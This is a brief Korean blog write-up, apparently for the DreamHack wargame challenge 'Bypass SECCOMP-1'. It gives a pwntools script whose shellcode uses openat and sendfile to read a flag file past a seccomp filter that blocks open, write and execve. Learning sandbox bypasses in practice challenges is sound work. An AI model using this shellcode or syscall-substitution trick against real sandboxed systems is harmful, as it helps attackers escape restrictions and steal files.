본문 바로가기

Bypass SECCOMP-1 본문

wargame/DreamHack

Bypass SECCOMP-1

Seongjun_You 2022. 2. 7. 21:41

해당 내용은 로드맵에 있는 문제로

새로운 방법을 알게 되어 포스팅을 했다.

 

 

exploit code

from pwn import *
context.arch = 'x86_64'
p = remote('host1.dreamhack.games' , 8982)

shellcode = shellcraft.openat(0, "/home/bypass_syscall/flag")
shellcode += shellcraft.sendfile(1, 'rax', 0, 0xffffffff)
p.sendline(asm(shellcode))
p.interactive()

해당 문제는

sandbox seccomp가 걸려있다.

open, write, exceve함수는 사용할 수 없다.

그래서 비슷한 함수인 openat, sendfile을 사용 했다.

 

'wargame > DreamHack' 카테고리의 다른 글

pwn_patch_1  (0) 2022.02.17
Inject ME!!!  (0) 2022.02.16
baseball  (0) 2022.02.03
hash-bronws  (0) 2022.02.03
tiny backdoor  (0) 2022.02.01
Comments